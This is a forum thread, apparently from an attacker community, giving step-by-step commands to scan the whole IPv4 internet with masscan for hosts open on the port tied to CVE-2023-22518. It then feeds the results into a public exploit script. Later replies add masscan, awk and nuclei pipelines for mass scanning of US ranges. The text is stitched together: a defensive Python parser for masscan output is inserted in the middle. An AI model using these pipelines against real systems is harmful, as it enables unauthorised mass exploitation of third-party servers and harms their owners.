
Using Masscan to Scan the Entire Internet for CVE-2023-22518

dataleak
User, registered 26.05.2024
In this tutorial, we will guide you through the process of using Masscan, a high-speed port scanner, to scan the entire internet for systems vulnerable to CVE-2023-22518. This CVE pertains to a specific vulnerability which you should verify and understand fully before proceeding.

Prerequisites

  1. A machine with Masscan installed: Ensure you have a dedicated server or virtual machine with sufficient resources.
  2. Root privileges: You need to run Masscan as root or with sudo privileges.
  3. Understanding of the CVE-2023-22518: Familiarize yourself with the specific ports and protocols associated with this CVE.

Step 1: Install Masscan

First, install Masscan on your machine. On a Debian-based system, you can do this with:

Code (bash):
sudo apt-get update
sudo apt-get install masscan

For other systems, you may need to build from source:

Code (bash):
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
sudo make install

Step 2: Understand the CVE-2023-22518

Before running a scan, understand which ports and services are affected by this CVE. Let's assume CVE-2023-22518 affects a service running on port 8080.

Step 3: Configure Masscan

Create a configuration file masscan.conf to set the parameters for the scan. Here is an example configuration:

Code (ini):
rate = 100000
output-format = binary
output-filename = scan_results.bin
ports = 8080

In this example:

  • rate sets the speed of the scan (100,000 packets per second).
  • output-format sets the output format (binary for faster performance).
  • output-filename specifies the name of the output file.
  • ports specifies the port to scan (8080 in this case).

Step 4: Run Masscan

To run Masscan using the configuration file, use the following command:

Code (bash):
sudo masscan -c masscan.conf

Alternatively, you can run Masscan with command-line arguments:

Code (bash):
sudo masscan 0.0.0.0/0 -p8080 --rate 100000 -oB scan_results.bin

Step 5: Convert Results to Readable Format

Masscan outputs results in binary format for efficiency. Convert the results to a readable format using:

Code (bash):
sudo masscan -oL scan_results.txt -r scan_results.bin

This command will generate a scan_results.txt file with the IP addresses of hosts running the vulnerable service on port 8080.

Step 6: Analyze Results

Open the scan_results.txt file to review the scanned IP addresses. Each line will show an IP address with the open port 8080.

Step 7: Verify Vulnerability

Having identified potentially vulnerable systems, you should verify the actual vulnerability using more specific tools or scripts related to CVE-2023-22518. This might involve:

Make sure to format the masscan output to the correct format for the POC code.

Code (bash):
git clone https://github.com/sanjai-AK47/CVE-2023-22518
cd CVE-2023-22518
python3 exploit.py -dL hosts.txt -o output.txt -t 30
 
You may use this to automate converting into the format.
Code:
masscan -iL IP.txt -p8080 --rate=10000 --exclude 255.255.255.255 |awk '{print $6}' > port8080.txt

IP.txt contains:
Code:
0.0.0.0-254.254.254.254
 
Or

they also write that:

I am interested in the ip2location-db1 (ip-country) database: https://www.ip2location.com/database/db1-ip-country
Can anyone share it? The free version does not have the full ranges. © reqwest
 
Masscan:
Code:
masscan -iL USA.txt -oL done.txt --rate 100000 --ttl 64 -p 444,443,4433,1443,2443,3443,4443,5443,6443,7443,8443,9443,10443,11443,12443 -sS -Pn -n --exclude 255.255.255.255

Parse:
Code:
awk '{ print $4 ":" $3 }' done.txt > parsed.txt

Nuclei:
Code:
nuclei -t templates.txt -l parsed.txt -rl 500 -o ready.txt -stats

templates.txt would contain the path to your nuclei templates.
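Both the first post (Steps 5 and 6, converting the binary results with -oL and reading the list) and the awk one-liner above work on masscan's list output format. The following parser is an added example from the editor, not code posted in this thread: it reads that format and is written for the defender's use of the same data, reviewing an authorized scan of your own address ranges and flagging open ports that are not in your asset inventory. The sample lines, the `SAMPLE_LIST_OUTPUT` name and the `expected` allow-list are constructed for the example.

```python
import ipaddress
from collections import defaultdict

# Constructed sample of masscan -oL (list) output; not real scan data.
# masscan writes a "#masscan" header, one record per line, and a "# end" trailer.
SAMPLE_LIST_OUTPUT = """\
#masscan
open tcp 443 203.0.113.10 1700000000
open tcp 8443 203.0.113.10 1700000001
open tcp 443 203.0.113.77 1700000002
open tcp 8080 198.51.100.5 1700000003
# end
"""


def parse_masscan_list(text):
    """Parse masscan -oL output into a list of record dicts.

    Each data line has the shape:
        <state> <proto> <port> <ip> <unix-timestamp>
    which is why the thread's awk one-liner prints $4 (ip) and $3 (port).
    Comment and header lines starting with '#' are skipped so they do not
    turn into empty ':' entries; malformed lines raise instead of being
    silently dropped.
    """
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 5:
            raise ValueError(f"malformed masscan list line: {line!r}")
        state, proto, port, ip, ts = parts[:5]
        ipaddress.ip_address(ip)  # raises ValueError on a garbage address field
        records.append(
            {"state": state, "proto": proto, "port": int(port), "ip": ip, "ts": int(ts)}
        )
    return records


def exposure_by_port(records):
    """Count distinct hosts per open port: a quick view of what is reachable."""
    hosts = defaultdict(set)
    for r in records:
        if r["state"] == "open":
            hosts[r["port"]].add(r["ip"])
    return {port: len(ips) for port, ips in hosts.items()}


def unexpected_exposures(records, expected):
    """Return sorted (ip, port) pairs that are open but absent from `expected`.

    `expected` is a set of (ip, port) pairs that are supposed to be reachable
    (a hypothetical allow-list built from your asset inventory). Anything
    returned here is an exposure nobody planned for and should be triaged.
    """
    return sorted(
        (r["ip"], r["port"])
        for r in records
        if r["state"] == "open" and (r["ip"], r["port"]) not in expected
    )


if __name__ == "__main__":
    recs = parse_masscan_list(SAMPLE_LIST_OUTPUT)
    print("hosts per open port:", exposure_by_port(recs))
    known = {("203.0.113.10", 443), ("203.0.113.10", 8443)}
    for ip, port in unexpected_exposures(recs, known):
        print(f"unexpected open port: {ip}:{port}")
```

Run it against a real `scan_results.txt` by passing the file contents to `parse_masscan_list`; the header-line check is what keeps the `#masscan` and `# end` lines from polluting the result, which a bare awk field print does not do.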
 
(quoting dataleak's tutorial post above)
http or https ?
 
(quoting the Masscan / Parse / Nuclei commands above)
after Parse
Code:
cat parsed.txt  | sed 's/.*/http\:\/\/&/' > parsed_http.txt

Code:
nuclei -t templates.txt -l parsed_http.txt -rl 500 -o ready.txt -stats